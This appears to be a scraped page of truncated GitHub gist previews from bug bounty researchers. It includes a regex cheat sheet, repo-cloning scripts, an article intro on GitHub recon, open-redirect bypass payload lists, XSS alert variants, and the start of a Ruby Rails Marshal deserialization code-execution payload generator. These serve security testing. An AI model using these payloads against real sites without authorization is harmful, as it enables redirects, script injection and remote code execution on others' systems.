vitorbritto

Regular Expressions

Basic Syntax

• /.../: Start and end regex delimiters
• |: Alternation
• (): Grouping

gh-backup-starred.sh

#!/bin/bash
 
user="CHANGEME"
pages=$(curl -I https://api.github.com/users/$user/starred | sed -nr 's/^Link:.*page=([0-9]+).*/\1/p')

for page in $(seq 0 $pages); do
    curl "https://api.github.com/users/$user/starred?page=$page&per_page=100" | jq -r '.[].html_url' |
    while read rp; do
      git clone $rp
    done

1N3

http://google.com
//google.com
\\google.com
\/google.com
\/\/google.com
/\google.com
/\/\google.com
|/google.com
/%09/google.com
/google.com

EdOverflow

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output

EdOverflow

/http://example.com
/%5cexample.com
/%2f%2fexample.com
/example.com/%2f%2e%2e
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com

tomnomnom

// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:

// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);

rootxharsh

alias reconme='function frecon()
{
         mkdir $1
         $HOME/./gowitness --chrome-path=/usr/bin/google-chrome file --source=$HOME/aquatone/$1/urls.txt -d $1/ -$
         $HOME/./gowitness --chrome-path=/usr/bin/google-chrome -D /var/www/html/recon/$1/.gowitness-$1.db gene$
         mv report.html $1/report-$1.html
         sed -i -e 's%var\/www\/html\/%%g' $1/report-$1.html
         chown -R www-data:www-data /var/www/html/recon
         touch /var/www/html/recon/$1/index.html

rootxharsh

#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
    marshal_payload = Base64.encode64(
      "\x04\x08" +
      "o" +

jhaddix

#!/bin/bash
export DEBIAN_FRONTEND=noninteractive;
echo "[*] Starting Install... [*]"
echo "[*] Upgrade installed packages to latest [*]"
echo -e "\nRunning a package upgrade...\n"
apt-get -qq update && apt-get -qq dist-upgrade -y
apt full-upgrade -y
apt-get autoclean

echo "[*] Install stuff I use all the time [*]"

0xInfection

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Written by: 0xInfection
# Context: https://twitter.com/har1sec/status/1183987309445820416
# Problem: https://gist.github.com/harisec/bff0ac7ad2e90da7e82297d945c63ef1

import optparse, sys
from urllib.parse import urlparse